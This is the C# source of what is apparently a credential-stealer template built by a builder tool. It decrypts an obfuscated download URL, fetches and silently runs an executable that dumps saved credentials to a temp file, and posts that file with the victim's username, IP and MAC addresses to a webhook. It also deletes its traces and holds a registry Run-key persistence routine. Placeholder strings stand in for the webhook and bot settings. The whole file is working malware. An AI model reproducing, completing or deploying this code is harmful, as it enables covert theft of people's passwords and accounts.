using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Threading.Tasks;
using System.Windows;
using System.Deployment;
using System.Net.NetworkInformation;

using System.Windows.Forms;

namespace IGH
{
    class Program
    {
        public static string temp = @"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp";
        public static byte[] Byte8(string veri)
        {
            char[] ArrayChar = veri.ToCharArray();
            byte[] ArrayByte = new byte[ArrayChar.Length];
            for (int i = 0; i < ArrayByte.Length; i++)
            {
                ArrayByte[i] = Convert.ToByte(ArrayChar[i]);
            }

            return ArrayByte;
        }


        public static string RC2_Coz(string strGiris)
        {
            string strSonuc;

            byte[] aryKey = Byte8("89129381972634");
            byte[] aryIV = Byte8("89129381972634");
            RC2CryptoServiceProvider cp = new RC2CryptoServiceProvider();
            MemoryStream ms = new MemoryStream(Convert.FromBase64String(strGiris));
            CryptoStream cs = new CryptoStream(ms, cp.CreateDecryptor(aryKey, aryIV), CryptoStreamMode.Read);
            StreamReader reader = new StreamReader(cs);
            strSonuc = reader.ReadToEnd();
            reader.Dispose();
            cs.Dispose();
            ms.Dispose();

            return strSonuc;


        }

        public static void GetCreds()
        {
            string download = (RC2_Coz("ttZID1v0v1TqMWhYdkJXb61/qNdz/g+aMmf8XEyyrsqfmkke0DHfIrYxUeyEbrB02o/nf8/+6KVMUebDYAcCV/JaoarxNQOJNNPIsmfNQ/y2EG0Qw208f3Qo+IYWR6nq"));

            WebClient wc = new WebClient();
            wc.DownloadFile(download, temp + "\\h0a8s7dfh.exe");
            wc.Dispose();
            Process process = new Process();
            ProcessStartInfo processStartInfo = new ProcessStartInfo();
            processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            processStartInfo.FileName = temp + "\\h0a8s7dfh.exe";
            processStartInfo.Arguments = "/C /stext " + temp + "\\791f026b19f642v.txt";
            process.StartInfo = processStartInfo;
            process.Start();
            Thread.Sleep(500);




        }





        static void Main(string[] args)
        {

            //sitelaunch

            string ipResult = "";
            string macResult = "";
            //grabip
            //grabmac


            string IpAddresses = "";
            string MacAddresses = "";
            if (ipResult != "") IpAddresses = "\n[IP Address] :";
            if (macResult != "") MacAddresses = "\n[Mac Addresses] :";


            GetCreds();

            Webhook wb = new Webhook("//webhook");
            wb.Name = "//botname";
            wb.ProfilePictureUrl = "//botpic";
            Thread.Sleep(200);
            wb.SendMessage3("```css" +
                "\n========================[Data From]=========================== "+ "```" +Environment.UserName+ "```"+
                IpAddresses+"``` " +ipResult+ " ```"+
                MacAddresses+"\n ```"+macResult, temp + "\\791f026b19f642v.txt");




            File.Delete(temp + "\\h0a8s7dfh.exe");
            File.Delete(temp + "\\791f026b19f642v.txt");

            //startup


            //errormessage
        }

        public static void AddToStartup()
        {

            RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            registryKey.SetValue("Windows", temp);




        }

        public static string GetIp()
        {
            WebClient ipGrab = new WebClient();
            string ipLink = "http://ipv4bot.whatismyipaddress.com/";
            string result = ipGrab.DownloadString(ipLink);
            return result;


        }
        public static string GetMac()
        {
            StreamWriter macWrite = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macler.txt");
            foreach (NetworkInterface bok in NetworkInterface.GetAllNetworkInterfaces())
            {

                string mac = string.Join(":", bok.GetPhysicalAddress().GetAddressBytes().Select(b => b.ToString("X2")));
                macWrite.WriteLine(mac);

            }
            macWrite.Close();

            return File.ReadAllText("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macler.txt");

        }


    }
    class Webhook
    {
        private HttpClient Client;
        private string Url;

        public string Name
        {
            get;
            set;
        }
        public string ProfilePictureUrl
        {
            get;
            set;
        }

        public Webhook(string webhookUrl)
        {
            Client = new HttpClient();
            Url = webhookUrl;
        }


        public bool SendMessage3(string content, string file = null)
        {
            MultipartFormDataContent data = new MultipartFormDataContent();
            data.Add(new StringContent(Name), "username");
            data.Add(new StringContent(ProfilePictureUrl), "avatar_url");
            data.Add(new StringContent(content), "content");

            if (file != null)
            {
                if (!File.Exists(file))
                    throw new FileNotFoundException();

                byte[] bytes = File.ReadAllBytes(file);

                data.Add(new ByteArrayContent(bytes), "Credentials." + Environment.UserName + ".txt", "Credentials." + Environment.UserName + ".txt");
            }

            var resp = Client.PostAsync(Url, data).Result;

            return resp.StatusCode == HttpStatusCode.NoContent;

        }



    }
}